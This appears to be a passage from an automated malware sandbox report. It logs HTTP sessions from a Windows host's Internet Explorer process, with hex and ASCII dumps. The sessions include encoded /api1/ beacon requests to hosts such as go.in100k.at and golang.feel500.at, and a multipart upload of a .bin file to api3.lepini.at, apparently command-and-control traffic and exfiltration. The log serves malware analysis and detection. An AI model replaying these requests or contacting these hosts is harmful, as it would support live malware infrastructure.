f0 cb b4 9c 5e 6a db 78 23 39 91 4f 45 b2 f6 52 c0 41 40 10 cf 60 73 74 ea b5 a1 24 71 69 78 84 62 91 07 96 09 92 c9 c3 3a 1d 58 79 01 de b7 6e 23 ec 4c Data Ascii: r)jge7f\^5WsZ8/$UP$Waq'yq/' C"F_{G,YPtnFgo?sUNCPB})<g}^ 5<8SlMJCY/S\|9B\^@PKoHzS %!p0-@TPt"S?'sH'1AH9RxZqS~)Ax3~ijy9&!]qgI4>@c>8}a{Ngla_iIeN/~OujPw&p-(2`'#5%Er9u?SJC)1 &402'br("HP%!sheBh9N@nokM-F"Y~IehxnElxog@L $wxTmCaQs5p+\|[R9@ca1\w)0,!Lfyy/@A*O'4"Q2V5WNquwtZuXTYiWvMb`M_D91SHGQ1)7q_XG,s,Ym\0Qq=^CRe8Hs^jx#9OERA@`st$qixb:Xyn#L
Feb 12, 2021 10:01:28.071022987 CET	7223	IN	Data Raw: 3b 34 85 5a e2 03 e8 56 a8 7b d5 64 b3 c7 0e 03 4e 45 05 98 27 a2 84 36 38 f8 85 22 b3 a0 51 7a 27 00 ed 0c 03 56 c3 ae 45 a6 c9 56 95 0e 91 ca e3 c0 4d d4 cc b6 88 35 6d 8e a4 a6 93 dd 94 1a c1 34 67 eb 1f f9 7c 2a 0d 17 01 ef 99 ba b3 03 01 d2 Data Ascii: ;4ZV{dNE'68"Qz'VEVM5m4g\|%]1I0O6$!2Hf"!%yklasVf`\#TvI>M8v=0$!C(Ub-5'Nw{L6T8OQeOpEfZ
Feb 12, 2021 10:01:28.071039915 CET	7224	IN	Data Raw: af 15 a9 7d 80 8d b1 ff e5 33 5d 77 6c ce 6c c9 63 b4 07 0a 39 6a c3 a5 3e 94 4e b8 59 23 60 18 69 ae 82 05 7b 5a 7d c9 f5 bc cf 7b dc 98 53 7f 04 19 44 88 24 ae ab 57 f7 23 82 7d 9a c0 ea 00 7b 24 50 8a 60 2b 57 ea 45 6f 8b 24 de 12 5b 76 72 ef Data Ascii: }3]wllc9j>NY#`i{Z}{SD$W#}{$P`+WEo$[vrC!)("F%&Ud1d->}pg,fE-7\UvqZDgz@GOFto'm^KwORC@ac47Ty"A3Y-
Feb 12, 2021 10:01:28.071055889 CET	7226	IN	Data Raw: 43 a0 f2 51 66 40 b4 fb 9c e1 78 0e 97 b7 b0 4a 4e 0e 06 ae cc ed b3 64 ce 51 d0 0d 2f f6 de c3 ae 20 f5 84 b5 37 19 70 8e ed 81 bd db bd 70 7f e4 23 30 ff 22 e9 f8 8e f3 a9 25 d8 9c 4c b7 fb a5 9d 59 c8 c5 d9 16 2f df aa d6 dd 26 51 08 79 51 3d Data Ascii: CQf@xJNdQ/ 7pp#0"%LY/&QyQ=EeVkq9&W}r:;pKufj;+6ih8K(D@`IW1)YYoY9x \Ccq:*@^-Ix4)2[17@2MdIl
Feb 12, 2021 10:01:28.071074009 CET	7227	IN	Data Raw: b8 5e 06 e4 94 29 29 7e 1c 5d e2 19 1a 5f f9 34 b9 cc d1 96 12 24 00 f8 21 7a 99 9f de b0 37 77 fc d7 b9 6b 6d a3 6f ea 2a 2c 98 41 31 bf df 0c 44 51 86 f4 38 eb 8b d7 86 30 1d 77 73 ac fa e2 e9 19 3e 5e df d1 3b e9 e5 f7 4d 21 3e b1 64 fe f2 ef Data Ascii: ^))~]_4$!z7wkmo*,A1DQ80ws>^;M!>d/iu6]o8#Ou@}\Y+)7>g37M,Q4]Pz`L&DP8PaC4mvh7&,]nI\|}_)
Feb 12, 2021 10:01:28.071089983 CET	7228	IN	Data Raw: 55 ba 46 09 2c 17 c9 04 8e f3 97 eb ff 1f 6b 6f f2 3e b3 f3 23 3e 61 29 4f 54 b0 d9 d1 ec 38 28 5b 6d 86 97 70 9e 0f 93 9b 91 e0 d9 25 72 29 cc 2d 95 d1 50 ca ba e9 1e 34 20 22 93 9d 62 19 8b 52 be 65 19 8a 68 0c 81 29 18 22 ac f3 49 d5 f5 2f 77 Data Ascii: UF,ko>#>a)OT8([mp%r)-P4 "bReh)"I/wx]#m8k*l^PGT4otUq\dph9]2C%q.a\[Vri9^Cm>SV5%fSC_=Y]kyQc;!C
Feb 12, 2021 10:01:28.071105957 CET	7230	IN	Data Raw: 39 b8 e6 89 29 33 33 56 eb 2f 16 62 a2 c6 ae 69 56 74 20 f6 a9 1d cd d8 85 73 54 78 fc 05 db 8e 4a 75 3b 86 61 2b 34 45 24 5d cd 63 eb 92 ee 91 28 d3 7c a7 0e e3 34 d3 69 e9 ed d9 dc f7 02 e9 5c f4 be 70 50 95 3a 28 30 73 40 23 14 50 e3 85 25 9f Data Ascii: 9)33V/biVt sTxJu;a+4E$]c(\|4i\pP:(0s@#P%c=/X2YRF%ex@F!jHy [gAL-'SEB+o68(Z#^XX(@?oKM5j/;P5F
Feb 12, 2021 10:01:28.071120977 CET	7231	IN	Data Raw: ef 48 dc 0d 3a 32 d3 26 bc 6a 7c ac 8a 19 13 c1 c4 cf a6 71 28 c8 32 8a 1e b1 9e 0a 6a fa cb ad a0 da be cb c3 68 88 5a 2b 35 93 53 61 9a f9 e2 fe 18 e9 4b 0d 4a 74 16 40 af a0 ef a9 4d c5 08 1c 77 67 c9 40 a3 b6 ec 32 fe 8e 58 e5 5e c0 1e 01 23 Data Ascii: H:2&j\|q(2jhZ+5SaKJt@Mwg@2X^#pc9gyaBNmCnzWMxFr>[A;N000P3b}\sLi)rS;3{{47,o@">%qJU~H[(9,Ks<XolJyq*
Feb 12, 2021 10:01:28.071141005 CET	7232	IN	Data Raw: e9 b2 fa 91 aa 3d bd a8 e1 37 5b 39 df c8 db 5e 80 43 b9 7e 3a c1 c5 ca 97 04 35 12 da 64 bc 65 30 b2 5c 95 7d 3e 7c 4e 27 09 24 08 3a 3d 06 3e 42 83 37 5c 28 a2 1f 8f e6 6f c0 5c 46 8c 2d b7 68 42 9f ef 96 44 95 71 73 ed 0b b3 69 47 ac 36 70 f1 Data Ascii: =7[9^C~:5de0\}>\|N'$:=>B7\(o\F-hBDqsiG6p3EI[!!vu%4lK>k/6.chL/43H/UVoooI2u@YeGT<9\>:&fH*VX2K]M6/{=Bqb:wj
Feb 12, 2021 10:01:28.071160078 CET	7234	IN	Data Raw: b3 1c 84 3e 1c bb 62 7c ac 51 9f 50 96 a7 17 0f b0 f1 d3 de d3 57 4b 49 d5 d1 d1 f0 74 f9 96 7f b3 83 e2 df 7c 0c 16 33 a0 4c 19 04 d2 f2 f7 77 c8 58 69 a8 27 25 a2 df 09 8d d4 22 b5 b6 d7 1c 5a ca ff d0 33 8e 94 a8 a6 ae 82 be a4 15 61 de a5 2c Data Ascii: >b\|QPWKIt\|3LwXi'%"Z3a,Cju>i<(TI#e;-\|b(&\KpzS(FRkH#!B:T[2VfSwdBK#@20w@h.;TLu&{X_$(R.HIUb+ri2iI
Feb 12, 2021 10:01:28.151842117 CET	7235	IN	Data Raw: d7 cb db b5 92 a7 c1 64 44 72 53 24 40 1a 68 4a 2a d5 44 d4 08 93 84 ff 85 93 1d 9c c2 21 38 35 2f 3b a0 80 65 b3 0f 63 34 af 16 21 6d fb 57 fc e9 e9 be 11 5f 07 8f 1a e4 cd 6d 54 79 26 8d e4 27 03 1e 33 15 c7 c9 e3 9a 85 e0 b0 6f a8 cb 69 58 de Data Ascii: dDrS$@hJ*D!85/;ec4!mW_mTy&'3oiXGUx`DhW\|Wk{1/x4_1BG.[#AOc@:wgNd\mFQT\>{i].X>@!gn1"SH~(5t1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49770	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:01:38.839165926 CET	7705	OUT	POST /api1/bEXxGnisNWK6xtmL7/hzYrMk4fVaqx/ViX9ZT9idqj/PQ9QlS_2Bewcsf/axkcAfr_2BzxGO9WnlqBd/umvUtqC2JD_2FbD6/jRIZuLHLzIoCsIu/th8f7Grv16LoelmZNm/uRoB0I5fl/RyNL47ZLZhHArmxOZnfP/f8ypX_2FMmc9Wn_2Fb7/mm90yk6M3N263p5s7_2FO7/65Wq2SHNyz0Tb/buzgvD7t/7CozDKzLEzGVXehbrpYH8bp/nDYW5twoJN/W5eyx_2BFnpNnvPUb/ZwRm3Bx_2BLc/U7tdViUVaKh/lB3EcM6_2BV2AV/kX7gmeVC/Z2x2FOp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=38282963314264099478466670964 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 561 Host: api3.lepini.at
Feb 12, 2021 10:01:38.839209080 CET	7705	OUT	Data Raw: 2d 2d 33 38 32 38 32 39 36 33 33 31 34 32 36 34 30 39 39 34 37 38 34 36 36 36 37 30 39 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 Data Ascii: --38282963314264099478466670964Content-Disposition: form-data; name="upload_file"; filename="6ADF.bin"w\:L]chy`[\|}#W^#i$WtQCP'K2a>]16k#N =ni_>9rTS0Sf
Feb 12, 2021 10:01:39.190356016 CET	7706	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49755	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:40.483550072 CET	5951	OUT	GET /api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: go.in100k.at Connection: Keep-Alive
Feb 12, 2021 10:00:40.928273916 CET	5953	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:00:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 76 83 50 14 45 3f 88 01 6e 43 82 13 dc 61 86 bb 3b 5f df 74 9a d5 d5 84 fb de 3d 67 ef a6 e0 89 a3 18 7e de 15 4b 53 77 28 ac f0 90 e3 64 61 5d 61 d9 ed d1 f3 09 d5 7e 0e 6b 36 77 f4 f6 83 21 e7 33 dc 70 4c cf d8 ba 49 92 9c 04 11 57 c5 81 34 ac b2 56 6b 38 cd b6 c4 8e b9 ee 46 e4 df 74 8b 98 77 8f 0b e0 c4 5a 9b 6a 7d 9d 7a d0 a0 1c 11 f7 03 75 ad 09 04 36 ac 09 7b 3c 76 2c a6 2b b1 9e 42 dc dd 7a a2 ab 36 88 ec 72 10 e4 4a 20 a8 3e e9 dd c7 85 b9 72 23 dd 03 52 63 af 13 bd e9 42 3d 85 1e f5 65 df 9e 85 dd be fe fd b4 fc c1 bc 62 60 4d 0e 04 0f 8d 18 54 e4 49 30 bb 2e 04 50 1e 4c 30 bc 7f 2f 72 19 ed 04 62 3c de 99 2b 5e 75 6c 7a 7b 02 8d 56 41 7d 34 cc a1 50 02 dc 22 52 d4 fc 5a 33 7f 1f 5c 5f a0 9b 11 30 42 1e 65 68 5e c7 72 3e 49 f1 46 98 4f 51 7d 6b e3 f3 4d f2 79 3c cb a8 46 4c 04 4b f7 1d 0f 88 d5 bb 8d 85 5c 13 50 2c 80 1c 8a e9 4e cf f3 51 5a 81 41 9e b8 b1 63 3c cd 58 b3 be f7 8f 23 aa a2 78 a1 ec 95 f0 34 92 8b 83 85 64 b1 01 ef de df 73 b9 b6 46 69 39 ce c4 91 bf ab ea 58 da 65 de f1 a5 8f 9d 85 f6 45 67 9f 61 93 3a e3 12 a9 b4 8f 7e cf 0a 25 5e 1d 8a f6 ed c4 59 19 32 c4 6e 37 95 26 44 5a 2c cb a9 ce 1b 86 f5 1a a9 c2 89 93 ea 85 48 9d 9b a1 00 f2 53 94 c0 b7 1d ec c0 86 c8 e0 a4 2f 5d c5 73 00 c6 e0 a6 65 a3 a4 d2 0c 09 79 e4 97 e0 8a 60 a6 ca 9a 41 c4 ec ea a1 b3 97 bb 0a 98 cb 4b c1 a6 9e 5a a8 06 3a fa 4a 3c 03 a6 c7 f1 83 64 06 96 77 58 6e f9 b4 22 b7 5c 6b e9 6f df b8 ed b6 e9 5b 10 b3 7b 7d 14 fb 73 57 dd 6c 91 8e 42 ce 50 d8 70 f2 12 99 3c 07 55 c6 ad 9e e9 2e a0 78 af cd c4 b7 6c af 64 c6 d0 ed b9 ca b3 a0 c8 1c ac 4c 04 3e 66 bc 29 a9 cc 19 64 94 60 c5 db ee 43 fb 6b cb ca 4b dc ca 36 4b b7 58 96 fe 80 fa 16 e9 4d b6 be 4a 2a d3 02 55 ee db f3 f1 f9 d0 57 e2 18 d8 41 14 ac 71 ba 1d 99 bd b6 20 aa 5c 89 27 c7 48 b8 8d d6 92 81 45 37 b0 10 8e e1 ec 69 c8 61 d6 20 b0 81 ae c9 80 03 f6 92 fa e1 26 cf 6e b7 71 0c 3a 0c c8 1c 77 c9 e9 c1 48 a3 84 fa 15 02 48 23 29 a4 07 c7 eb 0c d6 91 1e 7a 14 d8 b2 6f 10 e7 f8 4b 2e b2 ac 8f 28 d6 1f f5 c7 b1 a2 33 a3 2a c4 9d 45 ef fb 25 d2 5b 7c 7c ba 92 91 11 01 9c 7c 70 d5 85 1c 83 10 21 c1 23 30 b0 ef cb 13 d0 68 52 49 c1 95 6c 6d 89 38 90 85 f5 cb 89 f4 50 3b f7 e9 61 81 f3 ba fd 17 86 01 a6 a6 14 79 5f f7 1d 5c 46 b1 75 ce c2 50 5d 08 10 4f 35 95 f6 ee 86 7a 88 1d f7 2c dd e2 c9 48 19 83 77 c1 62 20 6a c3 1e 5e 05 4b 9f a2 1d 34 de 60 d8 c5 ee 5b 8a 82 c6 14 0e 65 16 ba 39 a2 13 9c a8 69 87 dd ad e7 27 ea ea bb 51 1d 6f df f6 e6 10 ae 88 44 42 53 e2 f5 09 ae f3 e8 18 8c 4e 3e 2d 98 1e dd fa 3b e9 66 53 a5 28 c2 0d db 04 84 07 6a 22 be ec 88 a2 8e 7b 41 da 39 9b 53 5b 08 70 51 9c e0 1d 62 56 22 55 0a be 21 4d b3 a8 a7 a8 9c ab 5c c2 a4 09 2a 16 2f 0c 79 c7 43 22 75 7a 2b 18 24 14 7e 18 12 6f d7 24 6f 2e 17 9b d7 96 3d 80 1a 96 dd 84 77 d7 6d 4a f6 2d ee 47 85 30 70 19 7b 80 b0 66 72 4b f5 7c 76 93 c6 d6 e6 b8 d4 aa 97 d0 1c 82 d3 23 2c 6b 78 96 8a 04 fb 08 60 52 49 89 cc 26 2b 16 e3 ad 19 fc 09 37 bb da 23 d3 ee 08 28 f9 48 a1 05 9f 6c ea 00 12 cf b2 82 2f 24 d3 bc a2 19 03 2b 8a 57 e1 f7 44 97 d8 7e b9 b2 c4 cb 2a 83 9f 4a 1d 66 df c5 4d Data Ascii: 2000vPE?nCa;_t=g~KSw(da]a~k6w!3pLIW4Vk8FtwZj}zu6{<v,+Bz6rJ >r#RcB=eb`MTI0.PL0/rb<+^ulz{VA}4P"RZ3\_0Beh^r>IFOQ}kMy<FLK\P,NQZAc<X#x4dsFi9XeEga:~%^Y2n7&DZ,HS/]sey`AKZ:J<dwXn"\ko[{}sWlBPp<U.xldL>f)d`CkK6KXMJUWAq \'HE7ia &nq:wHH#)zoK.(3E%[\|\|\|p!#0hRIlm8P;ay_\FuP]O5z,Hwb j^K4`[e9i'QoDBSN>-;fS(j"{A9S[pQbV"U!M\/yC"uz+$~o$o.=wmJ-G0p{frK\|v#,kx`RI&+7#(Hl/$+WD~JfM
Feb 12, 2021 10:00:40.928306103 CET	5954	IN	Data Raw: 2a 7b cf 53 2b 0a 3e c8 f6 b1 8d c4 4f 07 ea 26 ca 9a e0 82 f7 d9 20 b7 47 51 76 75 41 5c f6 a8 32 8c 42 77 56 17 7f 32 b6 0c ee ba 66 a0 d9 0a 0b 85 69 c5 db 2e da d5 26 40 58 af 68 f2 ea c2 50 11 69 f0 2e 23 80 14 01 6a 41 1e 49 c3 7e 5a ad f9 Data Ascii: *{S+>O& GQvuA\2BwV2fi.&@XhPi.#jAI~Z;8X,HFOYC(j2#KyjZGmfRSHB?4z= fPPO}#5f;V7\|`L76{E=xtT~d5!KNeR
Feb 12, 2021 10:00:40.928322077 CET	5955	IN	Data Raw: 05 d4 9b e4 ae 4f 75 ee fd 22 1e 79 9d e2 34 e3 18 c3 e7 73 97 80 fe c1 0b 78 95 55 75 01 1a d4 98 0a 86 36 89 47 26 6e 2b b7 93 17 59 77 73 0d 34 54 a4 de 5f 26 1b 2c 8f fb 13 60 91 9c 98 cd b9 b7 d2 42 df e5 b9 e1 41 63 a4 9c 43 02 da 41 74 22 Data Ascii: Ou"y4sxUu6G&n+Yws4T_&,`BAcCAt"7JY-?e]TQ}fKkH2)hd;/AM)_YYnO47>f.}`&aJXo;o) NuYVF-FT<,M
Feb 12, 2021 10:00:40.928339005 CET	5957	IN	Data Raw: 51 d0 ce d4 3b 0d 4b 35 3e 94 bc b9 f3 0b 1b 6f 83 d4 ac 92 2b f0 2a e9 9b 24 b3 c6 21 45 4a 41 00 aa 68 c6 0a 52 94 00 83 d3 63 dc 46 b6 68 19 f7 93 65 38 3d 24 9d f0 76 9b f2 6b c7 e9 3f 0b 84 bb 1a 57 09 7c 74 2f 5f 22 18 39 ba ca e3 a9 49 2b Data Ascii: Q;K5>o+*$!EJAhRcFhe8=$vk?W\|t/_"9I+\|dS0cLB-\|;b'-6`5e\|e#36WRHiS@877\|clXwaDF~82)-b6!Z@Y)9"2"/idjbq"6?2
Feb 12, 2021 10:00:40.928355932 CET	5958	IN	Data Raw: 92 0a 0f a1 2a 20 7c 58 e2 33 2c 0e 33 b1 57 73 6f 00 10 ad 1f 15 86 11 38 b9 ca f1 88 68 a0 b1 67 1f 60 a7 12 c4 bf 1f 63 d3 01 0e 6b 7d 7c a4 70 db 31 2d 4d d6 73 ff 8d d1 4c d5 09 c2 c6 1a df 1e c1 e9 48 30 7c 55 97 a5 7a 9e 90 9f 7d 81 02 33 Data Ascii: * \|X3,3Wso8hg`ck}\|p1-MsLH0\|Uz}3\|8[,o&$F\|tR~KY}6X?_~f9:}\-D0hm}bavycF\|&n+"3er q[e-6tdz~,A;?^O6bA&X
Feb 12, 2021 10:00:40.928373098 CET	5959	IN	Data Raw: bf 8b 24 f7 58 55 dd bf 4c 90 2c 65 0a 23 9a f2 33 10 84 47 f3 32 3d 7b d6 44 a1 af a6 cc a9 86 28 9c 58 04 f3 66 17 db c2 8c 6b 90 25 82 c0 bd 3a 1c bf f2 f7 12 81 1b 12 6e 91 ab d4 a5 20 c7 21 eb 5e 27 c4 5d d4 d0 53 6a ef 3a 6e 66 c7 b3 e6 dc Data Ascii: $XUL,e#3G2={D(Xfk%:n !^']Sj:nf2a,$Ssk&f@_H7kk'4@gvDoo*h`Mj7o0kA%@aODCi'YR!2vIr'Z%wpo\uM
Feb 12, 2021 10:00:40.968056917 CET	5961	IN	Data Raw: e5 76 61 30 42 34 dd cd 17 89 87 5f 63 5d 07 b7 b1 ea 4f 1e 8e 6b 23 55 61 5b fb 09 93 6a 5a a6 b0 fa 73 50 d1 c2 c9 7c 12 dc e9 d5 15 83 ea dc 23 08 82 e5 b1 67 70 bc 8e ca 74 1c 47 a0 0a 26 e2 2b 48 90 89 b7 c6 6e f4 03 cb 75 7a 14 fd 60 45 e2 Data Ascii: va0B4_c]Ok#Ua[jZsP\|#gptG&+Hnuz`ED/^WmGRA)ZR^ qPg;B2B%$L2LBHEolDm7B&1<3t6Uxp)%\F; o~\|
Feb 12, 2021 10:00:40.968084097 CET	5962	IN	Data Raw: f3 e8 9e 94 f6 61 42 14 b5 a8 69 98 22 49 8a 30 f9 3e 79 e0 9f 06 3f 39 a4 08 cd b8 7d 66 09 90 c8 fe 16 26 72 8c bc b1 69 6f e6 18 f0 b7 ac fc 06 97 2f ec 2d 14 d9 b1 b0 c2 f6 5f ba 34 36 c1 46 dd 43 8d 62 d5 e0 8e e3 ae cf e9 59 c4 3e 80 be 29 Data Ascii: aBi"I0>y?9}f&rio/-_46FCbY>)tl:Th\|\ti<z#_BF)7A>+KL\C%X'dDV/{^C7'kk=,Mv$>&o6xyn^\Zmz{;\_MBcp
Feb 12, 2021 10:00:40.968096018 CET	5964	IN	Data Raw: 67 1a 7d 31 ed 2f 0a 36 67 07 a9 6e ee 4e db 0c ad 99 44 74 af b7 b2 a8 10 55 57 7e d4 b4 b5 bf 41 e3 11 b6 42 f3 df c1 5a 32 13 eb f9 fa 49 d2 af 33 08 e8 75 ae 30 eb d2 8d a5 b3 f8 02 81 43 24 57 c2 e0 03 82 6d fa 1b 2a 3b 90 6f 97 bf 4a e0 b0 Data Ascii: g}1/6gnNDtUW~ABZ2I3u0C$Wm*;oJGr\UU1 ={E^z"PX.<4Q<Cwyc)\|_>@BXE;s7!bCFNB-pqVv(Q[:H18/0IJo!N[
Feb 12, 2021 10:00:40.968108892 CET	5965	IN	Data Raw: bd bb a1 6d 1d 2a 03 0d 76 34 37 fc 6e 09 38 96 8d 7b 4d 37 51 09 86 54 57 b1 80 9c 25 66 23 1b 5f e4 0b 71 9a e4 20 cb f9 8e b5 89 b6 0c bf 63 1d a2 77 86 1e 04 e2 23 de 5b 58 77 cc f4 5e 7c 7b 98 48 0a 43 52 9b 37 0f 9f 47 f8 76 99 fa f2 c9 b3 Data Ascii: m*v47n8{M7QTW%f#_q cw#[Xw^\|{HCR7Gvk -7X:+Q\|G3Q^Lo@c+y&aI)[3c}dMSyON1%ck6s}K$>_{I%Z}}u^=(9+u(lqO
Feb 12, 2021 10:00:41.006182909 CET	5966	IN	Data Raw: 6d 41 f1 73 0a 59 cb 31 a6 39 aa 5f 00 ef a1 a3 0d 41 6f 0d 9e cd 72 40 96 d9 1b d1 51 91 c0 29 48 74 74 cd 87 a9 6d 19 96 ae 62 f7 64 74 51 bf 41 6c 27 9b 61 28 1f 75 3d 3a e8 c7 61 d3 2f 98 7f 32 f7 c8 f8 20 7a 4b 69 a3 25 91 88 52 fb c6 59 37 Data Ascii: mAsY19_Aor@Q)HttmbdtQAl'a(u=:a/2 zKi%RY75*mwd/:%jzp8{5?kcmp(zn.\|R8Y-}S7-{Yx~_w$&@b:JhMih&dp+DyN%?F)iGU_<Ci$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49754	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:41.453052998 CET	6221	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: go.in100k.at Connection: Keep-Alive
Feb 12, 2021 10:00:41.541647911 CET	6221	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 09:00:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49757	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:41.666625977 CET	6222	OUT	GET /api1/tImL8jZlII9uy/Sa8Z12vW/JG0sDCYv96mnYtDsn1Jnt3e/XYTd0GATXg/XwcDwpCd2vvNyexYh/5IBZNKPDd82e/Sfq1uBktd3t/JAcKip5_2F1iiz/RPTyTdp7IDHiXyZe31kKi/YwPGUHlbAVrZQiJG/SzxK0AoLMu7pJz8/amcTh_2FxtM1YghDIM/RJhzMBJ32/UeEsYhC9E1juxsvgDHu2/XGHdHL4mrBZhgHYHQrE/_2FfBJOhnZDsrt5kghDKCq/x6jFt9w2z9sQ_/2BbtS3lh/ua5XHXz43d5GTeWt38fFqSh/tbGXpr_2B/jQf9TsE9 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: golang.feel500.at Connection: Keep-Alive
Feb 12, 2021 10:00:42.103462934 CET	6224	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:00:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 72 83 00 14 45 3f 88 05 6e 4b dc 09 6e 3b 9c e0 6e 5f df 74 d5 e9 4c 93 20 ef dd 7b 0e cd cc 0f 5f 06 7e fb d8 10 de 4f 69 07 c3 d5 00 89 c2 b4 6d 37 82 82 ba 3d f3 f6 69 65 1a 06 de fd 31 bc 33 4a cc 6a 01 bf 45 35 0a 23 a5 1b 20 4d 23 c4 4a 83 51 23 c8 15 38 97 d9 27 48 98 14 df 55 a4 d1 68 29 14 99 8d 43 af f8 c3 92 80 ff 71 9e 23 0e 24 e9 95 59 99 8e 6b 02 6c 83 ad ef 98 53 f4 fc ba 83 d3 57 24 e3 34 b1 20 e0 3d b4 07 3e 8c 40 1d 2f fe 4c 0a 24 91 f8 88 d3 74 7d 27 7a 88 0d 6a f3 95 3f 96 16 04 75 9c 20 5e 0f 3c c9 8e be c9 1d eb b6 c1 0b 45 a3 03 95 7f dd 26 bf e1 78 a4 8b a1 5c 4f 4c 2e ea 4d 2b 24 34 ea 82 30 05 87 36 ac ab 3a f4 92 49 45 14 91 55 37 6d 78 59 a3 75 09 f9 d8 1b 82 0b 81 e7 3d 9f 67 b3 b5 5e 5b 40 ca 92 b3 61 da ee 52 d0 51 73 02 7b 8c 88 f1 3a 3f b8 95 5c b5 5d fc 44 71 d3 34 85 75 56 89 95 df 91 5e 0b 89 5a 35 75 34 2f a9 18 dc 08 a4 57 9c ba f5 b0 90 3d b8 9d 94 69 95 de 6b 3e ae e9 87 c6 2b 74 cd 28 06 48 a5 d0 98 48 14 68 40 5b 64 e1 cf d9 e0 ca 1a 65 fc 72 7b 52 e3 87 76 f3 e9 2a 25 a0 19 b4 13 a4 ba e0 59 f5 db 6c 35 00 89 87 f2 a9 d8 6e 03 65 c3 1b a4 72 b7 e4 a2 b2 59 f0 aa 61 8e 73 50 30 c2 4c 53 e0 3d ab a1 26 4a c7 c5 b7 bc 15 38 f9 d6 a8 dd 3d e3 74 e3 bc 76 20 b9 c1 a2 53 91 bb c7 11 34 df 43 55 8b 9e b2 d1 b8 23 4d 08 ea 83 08 a1 5f 26 04 aa da e3 b9 8a 1a cc 9d 94 77 65 f4 42 7b cf 34 a3 5c 37 ef 0b 04 27 7c f4 ce 6b fb 33 44 ca 32 ca 8b 1e 53 65 11 15 3b e7 85 11 7b 8a 84 58 d3 06 74 bc 5f 65 50 2c a9 6c cd 9c 54 b8 ae f0 c1 59 a9 6b f1 91 07 d3 82 20 d5 4a 3c 56 9c fd dd b1 e7 29 73 02 23 88 cc 67 06 af ad da 9d 84 a8 fc e8 7b 86 9b 3a b5 db 77 bc d9 9a 22 d7 4a c2 39 be d2 e7 ed 2a 78 64 b1 58 b4 39 26 d9 88 ba eb 48 72 fc 76 c1 b8 2b a2 04 8f b9 9f ee 26 c2 7d 50 41 c2 c9 88 87 f6 f3 6a af 9c 9c 51 dd dd cb db 27 8a 